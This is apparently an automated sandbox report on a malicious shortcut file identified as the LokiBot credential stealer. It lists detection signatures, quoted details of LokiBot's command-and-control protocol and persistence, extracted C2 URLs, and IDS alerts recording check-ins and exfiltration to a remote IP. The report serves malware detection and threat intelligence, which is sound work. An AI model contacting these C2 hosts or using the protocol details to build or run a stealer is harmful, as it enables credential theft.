Windows Analysis Report
Comprobante.lnk.lnk

Overview

General Information

Sample name:	Comprobante.lnk.lnk
Analysis ID:	1524798
MD5:	b234c46d1f63b18ad2dc3f824bc0d6fa
SHA1:	fbdcce6b33b9e0ffbba48aadca0db9059af37141
SHA256:	8cd7bd86c1cc1be6d0c553fc3e8e02232b70363fadc3212989b1599a70c668d3
Tags:	lnkuser-abuse_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Lokibot

Yara detected Powershell download and execute

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Powershell drops PE file

Sigma detected: PowerShell DownloadFile

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses dynamic DNS services

Windows shortcut file (LNK) contains suspicious command line arguments

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Signatures

AV Detection

Found malware configuration

Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php"]}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\mjtjewi.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Comprobante.lnk.lnk

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49710 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64389 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49711 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49711 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49711 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.11:49711 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64357 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64387 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64375 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64379 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64389
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64384 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64384
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64354 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64354
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64391 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64379
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64391
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64350 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64350
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64352 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64387
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49715 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64402 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64404 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64362 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64402
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64404
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64395
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64398
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64422 -> 45.149.241.169:80
